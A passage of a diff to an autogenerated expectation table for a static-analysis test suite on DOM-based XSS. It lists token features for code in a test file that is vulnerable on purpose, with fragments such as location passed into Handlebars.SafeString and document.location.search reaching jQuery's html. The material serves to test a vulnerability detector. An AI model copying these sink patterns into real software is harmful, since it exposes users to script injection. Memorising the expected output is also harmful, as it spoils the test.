autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | $("body").append(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | $("body").append(e) | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | $("body").append(e) | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | $("body").append(e) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | exceptional return of $("body").append(e) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | exceptional return of $("body").append(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | exceptional return of $("body").append(e) | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | exceptional return of $("body").append(e) | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:311:3:311:21 | exceptional return of $("body").append(e) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:311:5:311:10 | "body" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:311:5:311:10 | "body" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:311:5:311:10 | "body" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17212,6 +119506,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:311:5:311:10 | "body" | enclosingFunctionBody | location e $ body append e location e $ body append e | | autogenerated/Xss/DomBasedXss/tst.js:311:5:311:10 | "body" | enclosingFunctionName | basicExceptions | | autogenerated/Xss/DomBasedXss/tst.js:311:5:311:10 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:311:13:311:18 | append | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:311:13:311:18 | append | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:311:13:311:18 | append | enclosingFunctionBody | location e $ body append e location e $ body append e | +| autogenerated/Xss/DomBasedXss/tst.js:311:13:311:18 | append | enclosingFunctionName | basicExceptions | +| autogenerated/Xss/DomBasedXss/tst.js:311:13:311:18 | append | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:311:20:311:20 | e | CalleeFlexibleAccessPath | $().append | | autogenerated/Xss/DomBasedXss/tst.js:311:20:311:20 | e | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:311:20:311:20 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17219,6 +119518,57 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:311:20:311:20 | e | enclosingFunctionBody | location e $ body append e location e $ body append e | | autogenerated/Xss/DomBasedXss/tst.js:311:20:311:20 | e | enclosingFunctionName | basicExceptions | | autogenerated/Xss/DomBasedXss/tst.js:311:20:311:20 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:315:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:315:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:315:0 | this | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:315:0 | this | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:315:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | 'arguments' object of function handlebarsSafeString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | 'arguments' object of function handlebarsSafeString | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | 'arguments' object of function handlebarsSafeString | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | 'arguments' object of function handlebarsSafeString | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | 'arguments' object of function handlebarsSafeString | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | exceptional return of function handlebarsSafeString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | exceptional return of function handlebarsSafeString | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | exceptional return of function handlebarsSafeString | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | exceptional return of function handlebarsSafeString | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | exceptional return of function handlebarsSafeString | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | functio ... OK!\\t\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | functio ... OK!\\t\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | functio ... OK!\\t\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | return of function handlebarsSafeString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | return of function handlebarsSafeString | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | return of function handlebarsSafeString | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | return of function handlebarsSafeString | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:315:1:317:1 | return of function handlebarsSafeString | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:315:10:315:29 | handlebarsSafeString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:315:10:315:29 | handlebarsSafeString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:315:10:315:29 | handlebarsSafeString | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | exceptional return of new Han ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | exceptional return of new Han ... cation) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | exceptional return of new Han ... cation) | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | exceptional return of new Han ... cation) | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | exceptional return of new Han ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | new Han ... cation) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | new Han ... cation) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | new Han ... cation) | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | new Han ... cation) | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:316:9:316:43 | new Han ... cation) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:22 | Handlebars | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:22 | Handlebars | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:22 | Handlebars | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:22 | Handlebars | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:22 | Handlebars | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:33 | Handleb ... eString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:33 | Handleb ... eString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:33 | Handleb ... eString | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:33 | Handleb ... eString | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:316:13:316:33 | Handleb ... eString | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:316:24:316:33 | SafeString | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:316:24:316:33 | SafeString | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:316:24:316:33 | SafeString | enclosingFunctionBody | Handlebars SafeString location | +| autogenerated/Xss/DomBasedXss/tst.js:316:24:316:33 | SafeString | enclosingFunctionName | handlebarsSafeString | +| autogenerated/Xss/DomBasedXss/tst.js:316:24:316:33 | SafeString | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | CalleeFlexibleAccessPath | Handlebars.SafeString | | autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17226,6 +119576,102 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | enclosingFunctionBody | Handlebars SafeString location | | autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | enclosingFunctionName | handlebarsSafeString | | autogenerated/Xss/DomBasedXss/tst.js:316:35:316:42 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:319:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:319:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:319:0 | this | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:319:0 | this | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:319:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | 'arguments' object of function test2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | 'arguments' object of function test2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | 'arguments' object of function test2 | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | 'arguments' object of function test2 | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | 'arguments' object of function test2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | exceptional return of function test2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | exceptional return of function test2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | exceptional return of function test2 | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | exceptional return of function test2 | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | exceptional return of function test2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | functio ... ngth)\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | functio ... ngth)\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | functio ... ngth)\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | return of function test2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | return of function test2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | return of function test2 | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | return of function test2 | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:319:1:324:1 | return of function test2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:319:10:319:14 | test2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:319:10:319:14 | test2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:319:10:319:14 | test2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:12 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:12 | target | enclosingFunctionBody | target document location search $ myId html target length | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:12 | target | enclosingFunctionName | test2 | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:12 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:320:7:320:39 | target | contextFunctionInterfaces | 